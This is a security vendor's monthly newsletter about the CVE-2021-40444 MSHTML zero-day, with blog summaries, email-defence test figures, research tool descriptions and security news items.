InQuest is excited to live on the bleeding edge of malware discovery and be the first to detect attacks targeting the CVE-2021-40444 0-day vulnerability.

This critical Microsoft MSHTML vulnerability will undoubtedly become a prized, click-free malware delivery mechanism. Threat actors have already leveraged the exploitation technique to drop various malware payloads, including Formbook and CobaltStrike. Read more within this Blog that details some of our initial observations.

InQuest Mail Provider Comparison

This month we tested 22,843 malicious file samples against Google and Microsoft's email defenses, and here's what made it through:

1,029 (4.7%) Missed

GSuite

4,769(26.3%) Missed

O365 ATP + Phishing

InQuire for a free, personalized email security assessment!

Latest InQuest™ Blog Posts

CVE-2021-40444

Posted on 2021-09-13 by Nick Chalard and Dmitry Melikov

As we roll into autumn and the season changes, so does the threat landscape. The emergence of new CVE signals another arms race with both sides vying for effectively leveraging the exploit and understanding how to mitigate the effects respectively. As with all Common Vulnerabilities and Exposures, comes questions such as “How does this affect me or my organization?” and “What can I do to mitigate this?” The focus of this blog is to explore these concerns as well as provide further context surrounding CVE-2021-40444 and the initial maldoc delivery.

Rechnung Financial Malspam

Posted on 2021-09-29 by Dmitry Melikov

Protecting an organization from today's cyber threats is not a simple and extensive task. The threat landscape is constantly changing, requiring a flexible approach to defense. The threats, techniques and vulnerabilities that cybercriminals exploit may be unknown to organizations that provide protection to their users. This is a prime example of the exploitation of a critical vulnerability. An exploit that was found in the wild.

InQuest™ Labs Research Spotlight

mlget

Use mlget to query multiple sources for a given malware hash and download it. The thought is to save time querying each source individually.

Yobi

Yobi is a basic firefox extension which allows to run public or private YARA rules on all scripts and pages rendered by the browser. Yobi saves files that trigger its rules and allows further inspection of them.

Newscatcher

Programmatically collect normalized news from (almost) any website. Filter by topic, country, or language.

Global Security Events

Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability

In August, Microsoft Threat Intelligence Center identified a small number of attacks that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders.

Russia arrests top cybersecurity executive in treason case

Russian authorities have arrested the chief executive of a leading Russian cybersecurity company on suspicion of state treason, a court said on Wednesday, sending a chill through Russia's IT and business sectors. Ilya Sachkov, 35, who founded Group IB, one of Russia's most prominent cyber security firms, was arrested on Tuesday, the RTVI TV channel reported as law enforcement officers carried out searches at the Moscow offices of the firm.

He Escaped the Dark Web's Biggest Bust. Now He's Back

JUST OVER FOUR years ago, the US Department of Justice announced the takedown of AlphaBay, the biggest dark web market bust in history. Thai police arrested the site's 26-year-old administrator, Alexandre Cazes, in Bangkok, and the FBI seized AlphaBay's central server in Lithuania, wiping out a marketplace that was selling hundreds of millions of dollars a year worth of hard drugs, hacked data, and other contraband to its 400,000-plus registered users.

Useful Links

Support

Social

Twitter

GitHub

InQuest™ Insider - Your monthly resource for the latest in cyber security news, trends, tips and tools. Subscribe here.

Unsubscribe here.